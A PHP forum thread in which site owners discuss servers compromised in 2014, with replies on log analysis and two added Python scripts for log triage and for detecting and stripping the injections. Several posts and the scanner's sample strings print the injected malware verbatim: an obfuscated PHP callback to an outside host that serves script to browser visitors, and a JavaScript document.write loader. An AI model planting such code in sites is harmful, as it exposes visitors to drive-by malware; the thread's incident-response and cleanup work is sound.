PHP Developers Network
http://forums.devnetwork.net/

Weird files on server
http://forums.devnetwork.net/viewtopic.php?f=30&t=139020
Page 1 of 1

Author:  mikebr [ Thu Jan 09, 2014 5:33 pm ]
Post subject:  Weird files on server

Hi,
I discovered that on Dec 25th and on Jan 4th some files were changed on a server account. I found the following code added to the file that is used to log in to the admin side of an admin account:

<?php
#4f9ad5#
error_reporting(0); ini_set('display_errors',0); $wp_li1101 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_li1101) && !preg_match ('/bot/i', $wp_li1101))){
$wp_li091101="http://"."error"."css".".com/css"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_li1101);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_li091101);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_1101li = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_1101li,1,3) === 'scr' ){ echo $wp_1101li; }
#/4f9ad5#
?>
<?php

?>
<?php

?>
<?php

?>
<?php

?>
<?php

?>
<?php

?>
<?php

?>
<?php

?>


This code was also in a PHP file placed in a directory called 'template'. This was not placed there by myself, and the directory has the same creation date as one of the dates when the other files were found to have been altered. The directory where the 'template' directory was located does not have write permissions.

I also saw that several jQuery files were altered; they seemed to have all the '+' operators removed. This would just break the code; it just didn't seem to make any logical sense.

This account has no other access apart from myself, so it's not as if someone else could have done this without gaining access to the account. The password has been changed, but does anyone have any idea as to what might have been going on?

P.S. Needless to say, the files have been replaced, removed and the password changed on the server.

Author:  requinix [ Thu Jan 09, 2014 6:36 pm ]
Post subject:  Re: Weird files on server

There was an exploit somewhere, but I think that goes without saying.

If you want to track down where, take a look at your server error logs (like auth logs) and your web server access logs (like to look for abnormal requests). If you're on a shared server then it's a bit harder and it could be that someone else on the server did it, but if you are then you should get your hosting provider to help you track down the problem - it's a problem for them too.

By the way, write permissions on a directory only matter when making changes to what is in the directory, such as creating new files. Files can be edited regardless (as long as you have write permissions on the file).

Author:  mikebr [ Fri Jan 10, 2014 2:20 pm ]
Post subject:  Re: Weird files on server

Thanks for the reply.

I looked at the error log and found the following:

[Thu Jan 09 15:36:21 2014] [error] [client 188.143.234.6] File does not exist: /home/user/public_html/++++++++++++++++++++++++++++++++++++++Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Erafkayatte";+\xe2\xee\xe7\xec\xee\xe6\xed\xee,+\xee\xf2\xef\xf0\xe0\xe2\xeb\xe5\xed\xee;, referer: http://domain.com/+++++++++++++++++++++ ... %E5%ED%EE;
[Thu Jan 09 11:25:22 2014] [error] [client 194.154.83.18] File does not exist: /home/user/public_html/user, referer: domain.com
[Thu Jan 09 03:20:56 2014] [error] [client 103.31.200.92] File does not exist: /home/user/public_html/js/+d.href+, referer: http://www.domain.com/js/+d.href+
[Thu Jan 09 03:20:56 2014] [error] [client 103.31.200.92] File does not exist: /home/user/public_html/js/+(, referer: http://www.domain.com/js/+%28/%5ehttps/ ... href%7c%7c


I am puzzled and curious; does anyone know what is actually being attempted here? I can't see much in the hacked files where PHP was added, except what looks like a URL transfer.
Anyone any idea?
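
To make the error-log triage that the replies suggest more systematic, here is an added Python example (my own, not from anyone in this thread) that parses Apache error_log "File does not exist" lines like the ones quoted above, groups them by client IP, and flags requested paths that do not look like file paths at all: escaped non-ASCII bytes (Apache writes them as \xHH), long runs of '+', or JavaScript source fragments such as +d.href+ . The sample lines are the ones quoted in this post with the domain.com placeholders kept; the flag names and the heuristics behind them are assumptions of mine, meant as a starting point for correlating with the access logs.

```python
import re
from collections import defaultdict

# Apache 2.2-style error_log line for a missing file, with an optional referer.
LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<ip>[^\]]+)\] "
    r"File does not exist: (?P<path>.*?)(?:, referer: (?P<referer>.*))?$"
)

# Constructed sample: the five lines quoted in this thread (domain.com kept as on the page).
SAMPLE_LOG = [
    r'[Thu Jan 09 15:36:21 2014] [error] [client 188.143.234.6] File does not exist: /home/user/public_html/++++++++++++++++++++++++++++++++++++++Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Erafkayatte";+\xe2\xee\xe7\xec\xee\xe6\xed\xee,+\xee\xf2\xef\xf0\xe0\xe2\xeb\xe5\xed\xee;, referer: http://domain.com/+++++++++++++++++++++ ... %E5%ED%EE;',
    r"[Thu Jan 09 11:25:22 2014] [error] [client 194.154.83.18] File does not exist: /home/user/public_html/user, referer: domain.com",
    r"[Thu Jan 09 03:20:56 2014] [error] [client 103.31.200.92] File does not exist: /home/user/public_html/js/+d.href+, referer: http://www.domain.com/js/+d.href+",
    r"[Thu Jan 09 03:20:56 2014] [error] [client 103.31.200.92] File does not exist: /home/user/public_html/js/+(, referer: http://www.domain.com/js/+%28/%5ehttps/ ... href%7c%7c",
    r"[Fri Jan 10 20:29:10 2014] [error] [client 180.76.6.16] File does not exist: /home/user/public_html/js",
]


def parse_line(line):
    """Split one error_log line into timestamp, client IP, path and referer (None if absent)."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def classify_path(path):
    """Heuristic flags (my own naming) for requested paths that are not plausible file names."""
    flags = []
    if "\\x" in path:                      # Apache escapes non-printable bytes as \xHH
        flags.append("escaped-bytes")
    if re.search(r"\+{5,}", path):          # long runs of '+' are not a file name
        flags.append("plus-padding")
    if re.search(r"\+[A-Za-z_$][\w$.]*\+|\+\(", path):  # looks like JS source, e.g. +d.href+
        flags.append("js-source-fragment")
    return flags


def triage(lines):
    """Group 404s per client IP with a hit count, the union of flags and the paths requested."""
    by_ip = defaultdict(lambda: {"count": 0, "flags": set(), "paths": []})
    for line in lines:
        rec = parse_line(line.strip())
        if rec is None:
            continue                        # not a 'File does not exist' line; skip
        entry = by_ip[rec["ip"]]
        entry["count"] += 1
        entry["paths"].append(rec["path"])
        entry["flags"].update(classify_path(rec["path"]))
    return dict(by_ip)


if __name__ == "__main__":
    # Noisiest clients first; each flagged IP is a candidate to look up in the access log.
    for ip, entry in sorted(triage(SAMPLE_LOG).items(), key=lambda kv: -kv[1]["count"]):
        print(f"{ip:16} hits={entry['count']} flags={sorted(entry['flags'])}")
        for p in entry["paths"]:
            print(f"    {p[:80]}")
```

Run it against the real file with `triage(open("/var/log/apache2/error_log").readlines())`; then take each IP that carries a flag to the access log for the same time window, which is what Celauran recommends above.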

Author:  Celauran [ Fri Jan 10, 2014 2:26 pm ]
Post subject:  Re: Weird files on server

Looks like the error log is giving you a list of 404s from exploits he tried. I'd take a look at the access logs for the same time period, as he eventually found one that worked.

Author:  Eric! [ Fri Jan 10, 2014 6:08 pm ]
Post subject:  Re: Weird files on server


Author:  mikebr [ Sat Jan 11, 2014 4:54 am ]
Post subject:  Re: Weird files on server


Author:  mikebr [ Sun Jan 12, 2014 11:19 am ]
Post subject:  Re: Weird files on server

BTW, on looking at the logs I see an error in the last couple of days where the person was looking for js files on the server. I changed directory names after I found the problem so it seems someone was looking for the old js directory.

[Fri Jan 10 20:29:10 2014] [error] [client 180.76.6.16] File does not exist: /home/user/public_html/js

Thanks again for everyone who replied on this post.

Author:  Eric! [ Mon Jan 13, 2014 4:50 pm ]
Post subject:  Re: Weird files on server

If you haven't upgraded all those libraries, you probably should, and also go through the release notes to see if you can find a security fix that matches the version and problem you witnessed. If you have the most recent libraries/files, then there might be a security flaw, and it's just a matter of time before they re-index your domain and find the file again. In fact, since you moved it and saw an error, they might have already re-indexed your files.

Author:  Weirdan [ Tue Jan 14, 2014 10:27 pm ]
Post subject:  Re: Weird files on server


Author:  apelissetti [ Thu Jan 16, 2014 6:46 pm ]
Post subject:  Re: Weird files on server

I also had the same attack.
On January 5 they injected this code into some .php files (index, header, footer, etc.):

<?php
#a3e35a#
error_reporting(0); ini_set('display_errors',0); $wp_vqcs1 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_vqcs1) && !preg_match ('/bot/i', $wp_vqcs1))){
$wp_vqcs091="http://"."html"."-style".".com/style"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_vqcs1);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_vqcs091);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_1vqcs = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_1vqcs,1,3) === 'scr' ){ echo $wp_1vqcs; }
#/a3e35a#
?>

On January 15 they injected this code into all the .js files on my server:

/*38c393*/
document.write("<script src='http://www.ceprede.es/y2W8Ljrc.php?id=122690528' type='text/javascript'></" + "script>");
/*/38c393*/

The problem is that I have many sites on a single shared server, so I cannot go back to where the attack started.

I think on some WP installation, but I don't know exactly.

:(
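
Both injections quoted in this thread share one shape: a six-hex-digit marker opens and closes the payload (#4f9ad5# ... #/4f9ad5# and #a3e35a# ... #/a3e35a# in PHP, /*38c393*/ ... /*/38c393*/ in JavaScript), the PHP variant hides its callback host by splitting the URL into "."-concatenated literals, and repeated runs leave empty <?php ?> pairs behind. The following is an added Python example of mine (not code from anyone in the thread) that finds such blocks across a web root, recovers the remote URLs for blocking and log searches, and strips the blocks without touching the rest of the file. The sample file contents are constructed from the blocks quoted above plus a few invented "legitimate" lines; the marker format, the six-digit length and the treatment of empty <?php ?> pairs are assumptions drawn from these two posts only.

```python
import os
import re

# Injected PHP block: "#xxxxxx#" ... "#/xxxxxx#" inside one <?php ... ?> pair,
# where xxxxxx is a six-hex-digit marker (4f9ad5 and a3e35a in the posts above).
PHP_INJECT_RE = re.compile(r"<\?php\s*#([0-9a-f]{6})#.*?#/\1#\s*\?>", re.DOTALL | re.IGNORECASE)
# Injected JS block: "/*xxxxxx*/" ... "/*/xxxxxx*/" (marker 38c393 above).
JS_INJECT_RE = re.compile(r"/\*([0-9a-f]{6})\*/.*?/\*/\1\*/", re.DOTALL | re.IGNORECASE)
# Empty "<?php ?>" pairs that repeated infection runs leave behind.
EMPTY_PHP_RE = re.compile(r"<\?php\s*\?>")
# Two or more double-quoted literals joined with PHP's "." operator: the trick that
# keeps the callback host out of a plain grep for the domain name.
CONCAT_RE = re.compile(r'"[^"]*"(?:\s*\.\s*"[^"]*")+')
LITERAL_RE = re.compile(r'"([^"]*)"')
SRC_RE = re.compile(r"""src=['"]([^'"]+)['"]""")

# Constructed sample: the PHP block from the first post, an empty pair, then invented content.
SAMPLE_PHP = '''<?php
#4f9ad5#
error_reporting(0); ini_set('display_errors',0); $wp_li1101 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_li1101) && !preg_match ('/bot/i', $wp_li1101))){
$wp_li091101="http://"."error"."css".".com/css"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_li1101);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_li091101);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_1101li = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_1101li,1,3) === 'scr' ){ echo $wp_1101li; }
#/4f9ad5#
?>
<?php

?>
<?php
// legitimate file content (constructed for this example)
require_once 'config.php';
echo "<title>Admin</title>";
?>
'''
# Constructed sample: the JS block from the later post, followed by invented script code.
SAMPLE_JS = '''/*38c393*/
document.write("<script src='http://www.ceprede.es/y2W8Ljrc.php?id=122690528' type='text/javascript'></" + "script>");
/*/38c393*/
(function () { var total = 1 + 2; })();
'''


def find_injections(text):
    """Return (kind, marker) for every marker-delimited block present in text."""
    found = [("php", m.group(1)) for m in PHP_INJECT_RE.finditer(text)]
    found += [("js", m.group(1)) for m in JS_INJECT_RE.finditer(text)]
    return found


def extract_indicators(text):
    """Recover the remote URLs the injected blocks contact (reassembling split PHP literals)."""
    urls = []
    for m in PHP_INJECT_RE.finditer(text):
        for run in CONCAT_RE.finditer(m.group(0)):
            joined = "".join(LITERAL_RE.findall(run.group(0)))
            if joined.lower().startswith("http"):
                urls.append(joined)
    for m in JS_INJECT_RE.finditer(text):
        urls.extend(SRC_RE.findall(m.group(0)))
    return urls


def clean(text):
    """Remove injected blocks and leftover empty <?php ?> pairs; keep everything else as-is."""
    text = PHP_INJECT_RE.sub("", text)
    text = JS_INJECT_RE.sub("", text)
    text = EMPTY_PHP_RE.sub("", text)
    return text.strip() + "\n"


def scan_tree(root, exts=(".php", ".js")):
    """Walk a web root and report infected files (read-only; cleaning is a separate step)."""
    report = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
                hits = find_injections(text)
                if hits:
                    report[path] = (hits, extract_indicators(text))
    return report


if __name__ == "__main__":
    for label, sample in (("header.php", SAMPLE_PHP), ("jquery.js", SAMPLE_JS)):
        print(label, find_injections(sample), extract_indicators(sample))
        print(clean(sample))
```

Run scan_tree("/home/user/public_html") first and review the report before writing anything back; the empty-pair rule assumes no legitimate file of yours contains a bare <?php ?>, and the jQuery files with the '+' operators stripped (described in the first post) have no marker to key on, so those still need to be restored from a clean copy or compared against the upstream release by checksum.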

Author:  requinix [ Thu Jan 16, 2014 7:41 pm ]
Post subject:  Re: Weird files on server


Page 1 of 1 All times are UTC - 5 hours